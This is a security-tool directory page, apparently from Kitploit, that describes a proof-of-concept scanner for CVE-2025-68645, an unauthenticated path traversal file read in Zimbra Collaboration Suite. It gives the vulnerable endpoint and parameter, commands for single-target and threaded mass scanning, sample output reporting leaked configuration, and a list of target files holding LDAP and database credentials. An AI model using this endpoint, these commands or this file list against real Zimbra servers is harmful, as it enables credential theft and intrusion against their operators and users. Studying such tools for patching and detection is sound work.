Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Poc_CVE-2025-68645 — Zimbra Path Traversal (CVE-2025-68645) - Unauthenticated file read vulnerability in Zimbra Collaboration Suite | Kitploit
Tools/GitHubGitHub/harisaidhin/poc_cve-2025-68645
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Unauthenticated file read vulnerability in Zimbra Collaboration Suite

View Repository
114 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-68645 - Zimbra Path Traversal Vulnerability

Security CVE Python License Status

📋 Overview

CVE-2025-68645 is a path traversal vulnerability in Zimbra Collaboration Suite that allows unauthenticated attackers to read arbitrary files from the server's filesystem.

Vulnerable Endpoint

/h/printconversations?javax.servlet.include.servlet_path=

🎯 Impact

ImpactSeverity
Unauthenticated file read🔴 High
Configuration disclosure🔴 High
Credential leakage🔴 High
Internal network mapping🟠 Medium

📁 Readable Files

🚀 Usage

Single Target Scan

python CVE-2025-68645.py.py -t https://target.zimbra.com

Mass Scanning

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

Advanced Options

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 Command Line Arguments

Argument Description Default -t, --target Single target URL None -l, --list File containing list of targets None -o, --output Output file name results.json --threads Number of concurrent threads 10 --timeout Request timeout in seconds 15 -v, --verbose Enable verbose output False --no-verify Disable SSL verification False --read-all Read all sensitive paths False

📸 Example Output

[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml

============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0

Download Tool
PathInformation Exposed
/WEB-INF/web.xmlServlet mappings, security constraints
/WEB-INF/zcs.web.xmlZimbra-specific configuration
/opt/zimbra/conf/localconfig.xmlLDAP credentials, database passwords
/opt/zimbra/conf/ldap-config.xmlLDAP server configuration
/opt/zimbra/conf/attrs/zimbra-attrs.xmlSystem attributes
/WEB-INF/classes/logging.propertiesLogging configuration